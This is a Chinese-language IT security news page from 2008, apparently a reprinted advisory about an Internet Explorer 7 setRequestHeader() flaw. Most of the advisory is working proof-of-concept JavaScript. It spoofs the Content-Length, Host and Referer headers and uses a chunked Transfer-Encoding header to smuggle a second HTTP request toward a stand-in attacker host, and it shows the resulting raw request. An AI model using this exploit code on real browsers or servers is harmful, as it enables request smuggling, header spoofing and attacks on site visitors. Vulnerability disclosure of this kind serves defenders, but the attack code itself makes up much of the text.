|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
您现在的位置: ChinaBeta.cn 中文IT资讯 >> 网络安全 >> 警戒公告 >> HACK技术正文
MS IE 7 setRequestHeader() 请求拆分和渗透漏洞
Www.ChinaBeta.Cn 更新时间:2008-3-31

【ChinaBeta.Cn 网络安全】

受影响系统
Microsoft Internet Explorer 7.0.5730.11
- Microsoft Windows XP SP2

描述:
Internet Explorer是微软发布的非常流行的WEB浏览器。

IE 7允许通过HTTP请求拆分攻击覆盖Content-Length、Host和Referer等HTTP头,导致HTTP头信息欺骗。

类似于以下javascript:

var x=new XMLHttpRequest();

x.open("POST","/");
for(f=127;f<255;f++)
try{
x.setRequestHeader("Host"+String.fromCharCode(f),"Test");
}catch(dd){}
x.setRequestHeader("Connection","keep-alive");
x.onreadystatechange=function (){
    if (x.readyState == 4){
   }
}
x.send("blah");

会覆盖以下头:

- Content-Length
   x.setRequestHeader("Content-Length"+String.fromCharCode(201),"0");
   x.setRequestHeader("Content-Length"+String.fromCharCode(233),"0");
   x.setRequestHeader("Content-Length"+String.fromCharCode(240)+String.fromCharCode(213),"0");

- Host

   x.setRequestHeader("Host"+String.fromCharCode(223), "www.microsoft.com");

- Referer

   x.setRequestHeader("Referer"+String.fromCharCode(205)+String.fromCharCode(155),"http://www.referrer.tld");
   x.setRequestHeader("Referer"+String.fromCharCode(237)+String.fromCharCode(155),"http://www.referrer.tld");

Internet Explorer 7允许在setRequestHeader中设置Transfer Encoding: chunked头,导致Http请求拆分/渗透漏洞。

假设存在反射跨站脚本漏洞影响的站点与攻击者的站点托管在同一台主机上,且用户没有配置代理,由于IE7允许设置

setRequestHeader("Transfer-Encoding","chunked");

因此就允许将POST请求中的负载用作Web服务器的其他请求。例如:

var x=new XMLHttpRequest();

for(var i =0; i<1;i++){
x.open("POST","/");
x.setRequestHeader("Transfer-Encoding","chunked");

x.setRequestHeader("Proxy-Connection","keep-alive");
x.setRequestHeader("Connection","keep-alive");
x.onreadystatechange=function (){
    if (x.readyState == 4){
    }
}
try{
x.send("0\r\n\r\nPOST / HTTP/1.1\r\nHost:
at.tack.er\r\nContent-Length: SOMELENGTH\r\n\r\n")  }catch(r){} }

请求会变为:

POST / HTTP/1.1
Accept: */*
Accept-Language: it
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache
Referer: http://vi.ct.im/
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;
.NET CLR 2.0.50727; .NET CLR 1.1.4322)
Host: at.tack.er
Content-Length: 67

0

POST /?Send1 HTTP/1.1
Host: at.tack.er
Content-Length: TheLenghtOfTheNextRequest

这样Web服务器就会打开套接字等待负载。

厂商补丁:
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.microsoft.com/windows/ie/default.asp

Google

(责任编辑:hahack)

注:本站所有资料均为个人爱好与广大网友分享!如用于非法!造成一切后果自负·与本站无关!
发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
热门文章 相关报道
普通HACK技术 [警戒公告]php My Admin工具中sort_by参数远… (09-22)最新HACK技术
普通HACK技术 [警戒公告]Landesk QIP Server服务 Heal报文… (09-22)最新HACK技术
普通HACK技术 [警戒公告]Windows操作系统SMB WRITE_ANDX处… (09-22)最新HACK技术
普通HACK技术 [菜鸟入门]三方法 杜绝企业网络安全管理系统… (09-03)
普通HACK技术 [菜鸟入门]掌握术语 分清电脑安全漏洞的危险… (09-03)
普通HACK技术 [编译|破解]Friendly Technologies fwRemote… (09-03)
普通HACK技术 [编译|破解]虚拟PC软件VMware2008-0014更新修… (09-03)
普通HACK技术 [菜鸟入门]三种方法 让你的交换机和路由器更… (09-02)
普通HACK技术 [编译|破解]Red Hat目录服务器LDAP请求内存泄… (09-02)
普通HACK技术 [菜鸟入门]消除隐患 创建计算机安全密码三大… (08-29)
  • php My Admin工具中sort_by…

  • Landesk QIP Server服务 He…

  • Windows操作系统SMB WRITE_…

  • 三方法 杜绝企业网络安全管…

  • 掌握术语 分清电脑安全漏洞…

  • Friendly Technologies fwR…

  • 虚拟PC软件VMware2008-0014…

  • 三种方法 让你的交换机和路…

  • Red Hat目录服务器LDAP请求…

  • 消除隐患 创建计算机安全密…

    		•
      网友评论内容:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)
    I D *
    邮 箱
    主 页
    评 分 1分 2分 3分 4分 5分
    评 论

    关于我们  中国·国家信息产业部{粤ICP备06006652号}{陇ICP备06002562号}
    版权所有:『AK网盟基地』站长:Hahack | QQ:80505955 | E-mail:Hahack@Gmail.com
    Copyright (C) 2005-2007  akhack.org|chinabeta.cn All Rights Reserved